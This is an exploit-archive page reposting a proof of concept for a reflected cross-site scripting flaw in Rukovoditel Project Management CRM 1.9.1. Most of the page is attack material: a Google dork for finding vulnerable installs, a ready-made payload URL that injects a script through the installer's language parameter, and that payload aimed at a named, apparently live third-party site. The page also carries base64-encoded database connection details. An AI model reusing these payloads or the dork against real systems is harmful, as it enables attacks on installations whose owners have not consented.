Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020088

Below is a copy:

Rukovoditel Project Management CRM 1.9.1 - XSS Vulnerability
====================================================================================================================================
| # Title     : Rukovoditel Project Management CRM 1.9.1 - XSS Vulnerability                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : https://www.rukovoditel.net/                                                                                       |  
| # Dork      : "Powered by Rukovoditel"                                                                                           |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use Payload : install/index.php?db_error=Error: (2002) Connection refused&lng=russian'"()%26%25<acx><script>alert(/indoushka/);</script>&params=eyJkYl9ob3N0IjoibG9jYWxob3N0IiwiZGJfbmFtZSI6ImNja3R4ZnRzIiwiZGJfcGFzc3dvcmQiOiJnMDBkUGEkJHcwckQiLCJkYl9wb3J0IjoxLCJkYl91c2VybmFtZSI6Inh4dHVvcnR2IiwibG5nIjoicnVzc2lhbiJ9&step=database_config

[+] https://inttotal.com//hrprocess/install/index.php?db_error=Error:%20(2002)%20Connection%20refused&lng=russian%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E&params=eyJkYl9ob3N0IjoibG9jYWxob3N0IiwiZGJfbmFtZSI6ImNja3R4ZnRzIiwiZGJfcGFzc3dvcmQiOiJnMDBkUGEkJHcwckQiLCJkYl9wb3J0IjoxLCJkYl91c2VybmFtZSI6Inh4dHVvcnR2IiwibG5nIjoicnVzc2lhbiJ9&step=database_config

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.